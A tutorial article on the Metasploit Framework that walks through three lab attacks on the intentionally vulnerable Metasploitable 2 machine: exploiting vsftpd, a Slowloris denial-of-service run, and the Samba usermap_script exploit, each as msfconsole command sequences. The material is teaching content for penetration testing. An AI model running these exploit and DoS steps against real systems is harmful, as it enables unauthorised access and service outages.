Open In App

We use cookies to ensure you have the best browsing experience on our website. By using our site, you acknowledge that you have read and understood our Cookie Policy & Privacy Policy

What is the Metasploit Framework in Linux?

A Metasploit framework is a tool that is used by ethical hackers, security researchers, and pentester to testing of the vulnerability. It helps us to find vulnerabilities in networks, systems, and IoT. It’s an open-source tool. It can be customized with the operating system. It’s a bunch of exploits for various platforms. This Framework is written in a ruby programming language. A user may set up an exploit module, combine it with a payload, aim at a target, and fire it against the target system using the different tools, libraries, user interfaces, and modules of Metasploit. Hundreds of exploits and different payload choices are contained in the vast and comprehensive database of Metasploit. 

Let’s understand the Metasploit Framework through various types of examples.



Example 1: Hack FTP Server Using Metasploit

Here we will be using a vulnerable machine called Metasploitable 2. Follow the below steps to Hack FTP Server.

Step 1: Scanning all the open ports and services using Nmap (Nmap is a network scanning tool)



nmap -Pn -sV 192.168.29.94

 

Command Explanation 

Step 2: Exploit with Metasploit Framework.

msfconsole

In the below screenshot, we are stating the Metasploit console using the msfconsole command.

 

Step 3: Here we can see the FTPftp service is open called vsftpd (Very Secure FTP Daemon) is an FTP server for Unix-like systems, including Linux, and the port number is 21. Let’s get into the server. Search for Version which is FTP server used on it. Here I’m Searching for vsftpd. Here We use the search option for the search exploit.

search vsftpd

 

Command Explanation

Step 4: Now, we will be selecting the exploit by using the use command.

use 0

 

Command Explanation

Step 5: Now we will see what are the requirements of run this exploit.

show options

 

Command Explanation:- 

Step 6: Now we will run the exploit and get access to the FTP server.

exploit

We have got access to the FTP server of the target machine Metasploitable 2

 

Example 2: Using Metasploit for DOS attack

Step 1: Type Command msfconsole for entering Metasploit Framework

msfconsole

 

Step 2: Use the payload auxiliary/dos/http/slowloris to perform DOS attack on victim.

use auxiliary/dos/http/slowloris

 

Slowloris tries for many connections to the target machine or web server open and holds them open as long as possible. This accomplishes by opening connections to the target web server and sending requests. Periodically, it will send HTTP request headers. Eventually denying additional connection attempts from client.

Command Explanation:

Step 3: Show the requirements to run the exploit.

show options

 

Command Explanation:

Step 4: Set the target IP to run this exploit.

set rhost 192.168.29.94

 

Command Explanation:

Step 5: Run this Exploit to run the dos attack.

exploit

Multiple requests are been hit to the victim machine.

 

Command Explanation:

Example 3: Using Metasploit to hack through Samba Usermap Script vulnerability 

Step 1: Enter the Metasploit Framework using the following command.

msfconsole

 

Command Explanation:- 

Step 2: Use exploit for the Samba Usermap Script vulnerability.

use exploit/multi/samba/usermap_script

 

Command Explanation:

Step 3: Show the requirements of the exploit.

show options

 

Command Explanation:-

Step 4: Set the credentials to run the exploit.

set RHOSTS 192.168.29.47

 

Command Explanation : 

Step 4: Exploit the vulnerability by running the payload.

exploit

 

We have successfully hacked the Samba Usermap Script vulnerability .

Article Tags :
Linux-Unix
Recommended Articles
1. Find Vulnerable Webcams with Shodan [Metasploit Framework]
2. Adding a third party Module into Metasploit Framework
3. Linux - Metasploit Command
4. How to use a Reverse Shell in Metasploit in Kali Linux
5. Using Metasploit and Nmap to Scan for Vulnerabilities in Kali Linux
6. Working with Payload Metasploit in Kali Linux
7. Deploying a Payload with Metasploit in Kali Linux
8. Creating a Persistent Reverse Shell with Metasploit in Kali Linux
9. Validating a Vulnerability Metasploit in Kali Linux
10. Katana Framework - Hacking Framework in Kali Linux
11. What is Metasploit?
12. How to Use Metasploit’s Interface
13. Difference Between Sucuri and Metasploit
14. Social Engineering Techniques in Metasploit
15. Brute Force Attack in Metasploit
16. TIDoS-Framework - Offensive Web Application Penetration Testing Framework
17. Lockdoor Framework - Penetration Testing Framework With Cyber Security Resources
18. How to Install BlackDir-Framework in Linux?
19. OSRFramework - Open Source Research Framework on Linux
20. SpiderFoot – A Automate OSINT Framework in Kali Linux
21. Gloom – Linux Penetration Testing Framework
22. Optiva Framework - Web Application Vulnerabilities Scanner
23. Nettacker - Automated Penetration Testing Framework
24. Reconspider - Most Advanced Open Source Intelligence (OSINT) Framework
25. Maryam - Perfect OSINT Framework